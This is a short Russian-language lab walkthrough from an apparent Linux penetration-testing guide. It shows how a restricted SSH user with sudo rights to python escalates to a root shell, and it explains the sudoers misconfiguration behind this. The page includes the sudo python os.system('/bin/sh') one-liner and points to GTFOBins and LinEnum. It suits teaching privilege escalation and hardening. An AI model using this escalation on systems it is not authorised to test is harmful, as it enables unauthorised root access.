# 03 - Misconfig

Нам удалось зайти по ssh. Таким образом мы имеем уже 2 учетные записи на сервере, а значит и увеличили контроль присутствия.\
Снова проводим[ local enumeration](https://reeves0x0.gitbook.io/linux-under-attack/exploitation/02-local-enumeration) и понимаем что вторая учетная запись тоже ограничена и не входит в группу [sudo](https://wiki.archlinux.org/title/Sudo_\(%D0%A0%D1%83%D1%81%D1%81%D0%BA%D0%B8%D0%B9\)), однако  учетная запись steven имеет права на использование python ! 

```bash
// логинимся
ssh steven@192.168.140.129
// проверяем права
sudo -l
```

<figure><img src="https://2826317613-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyxXcvCa5Rbt6bHhLblf7%2Fuploads%2FBBCQDF1VLnTdVHkm3v6W%2F%D0%B8%D0%B7%D0%BE%D0%B1%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5.png?alt=media&#x26;token=13eec7d9-c32b-4c4f-92d4-f9417d6abddf" alt=""><figcaption><p>мисконфиг в безопасности sudoers</p></figcaption></figure>

Если нам доступен python, с его помощью мы можем получить root шелл.\
Есть отличный ресурс, который собирает разные мисконфиги разных программ, рекомендую [GTFOBins](https://gtfobins.github.io/)&#x20;

```python
// Получем root с помощью python
sudo python -c 'import os; os.system("/bin/sh")'
```

<figure><img src="https://2826317613-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyxXcvCa5Rbt6bHhLblf7%2Fuploads%2F6SJlXWAZNXZzT2bIuThd%2F%D0%B8%D0%B7%D0%BE%D0%B1%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5.png?alt=media&#x26;token=6a942412-6aca-4151-8b67-3e0e659f7658" alt=""><figcaption><p>Были Стивеном стали рутом</p></figcaption></figure>

Что тут произошло ? \
Если с помощью sudo разрешен запуск двоичного файла от имени суперпользователя, он не теряет повышенных привилегий и может использоваться для доступа к файловой системе, расширения или поддержания привилегированного доступа.\
Вот что )))

Кстати рекомендую скрипт [Local Linux Enumeration & Privilege Escalation Checks](https://github.com/rebootuser/LinEnum) для быстрой энумерации и проверки на мисконфиги.